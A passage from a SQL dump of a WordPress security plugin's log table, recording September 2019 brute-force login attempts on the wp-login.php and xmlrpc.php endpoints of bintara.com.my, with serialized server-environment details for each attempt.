15:57:18',18255200,19554560,'https://bintara.com.my/xmlrpc.php',1,0,'213.122.172.69'),(23887,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"213.122.172.69\";s:11:\"REMOTE_PORT\";s:5:\"40894\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5fWuoTLkHKFi2qF7FGIQAAABg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568563034.3889\";s:12:\"REQUEST_TIME\";s:10:\"1568563034\";}}','notice','2019-09-15 15:57:15','2019-09-15 15:57:14',17737728,19230656,'https://bintara.com.my/wp-login.php',1,0,'213.122.172.69'),(23886,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"38776\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5c3b1rBLb0GV3O7mS4rgAAAFI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568562397.5703\";s:12:\"REQUEST_TIME\";s:10:\"1568562397\";}}','notice','2019-09-15 15:46:39','2019-09-15 15:46:37',18254496,19552464,'https://bintara.com.my/xmlrpc.php',1,0,'166.62.123.55'),(23885,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.123.55\";s:11:\"REMOTE_PORT\";s:5:\"38316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5c2uoTLkHKFi2qF7FE7wAAABE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568562394.8384\";s:12:\"REQUEST_TIME\";s:10:\"1568562394\";}}','notice','2019-09-15 15:46:36','2019-09-15 15:46:35',17736880,19228096,'https://bintara.com.my/wp-login.php',1,0,'166.62.123.55'),(23884,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"63656\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5XYuoTLkHKFi2qF7FCIgAAABQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568560994.3084\";s:12:\"REQUEST_TIME\";s:10:\"1568560994\";}}','notice','2019-09-15 15:23:15','2019-09-15 15:23:14',18254448,19552920,'https://bintara.com.my/xmlrpc.php',1,0,'192.241.190.85'),(23883,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"192.241.190.85\";s:11:\"REMOTE_PORT\";s:5:\"63110\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5XXmCCaIOMm5l5jJEeCAAAAQ8\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568560990.9026\";s:12:\"REQUEST_TIME\";s:10:\"1568560990\";}}','notice','2019-09-15 15:23:12','2019-09-15 15:23:11',17737928,19228680,'https://bintara.com.my/wp-login.php',1,0,'192.241.190.85'),(23882,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.229.72.84\";s:11:\"REMOTE_PORT\";s:5:\"33960\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5U1uesTgPVjZVPWmsdPQAAAMA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568560342.1209\";s:12:\"REQUEST_TIME\";s:10:\"1568560342\";}}','notice','2019-09-15 15:12:23','2019-09-15 15:12:22',18253832,19551504,'https://bintara.com.my/xmlrpc.php',1,0,'103.229.72.84'),(23881,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.229.72.84\";s:11:\"REMOTE_PORT\";s:5:\"33570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5U0@esTgPVjZVPWmsdOwAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568560339.7472\";s:12:\"REQUEST_TIME\";s:10:\"1568560339\";}}','notice','2019-09-15 15:12:21','2019-09-15 15:12:20',17905184,19228672,'https://bintara.com.my/wp-login.php',1,0,'103.229.72.84'),(23880,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.229.72.84\";s:11:\"REMOTE_PORT\";s:5:\"33570\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5U0@esTgPVjZVPWmsdOwAAANA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568560339.7472\";s:12:\"REQUEST_TIME\";s:10:\"1568560339\";}}','notice','2019-09-15 15:12:21','2019-09-15 15:12:20',17742480,19228672,'https://bintara.com.my/wp-login.php',1,0,'103.229.72.84'),(23879,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.131.58.179\";s:11:\"REMOTE_PORT\";s:5:\"55376\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XX5R2r1rBLb0GV3O7mS3ggAAAFQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568559578.4623\";s:12:\"REQUEST_TIME\";s:10:\"1568559578\";}}','notice','2019-09-15 14:59:39','2019-09-15 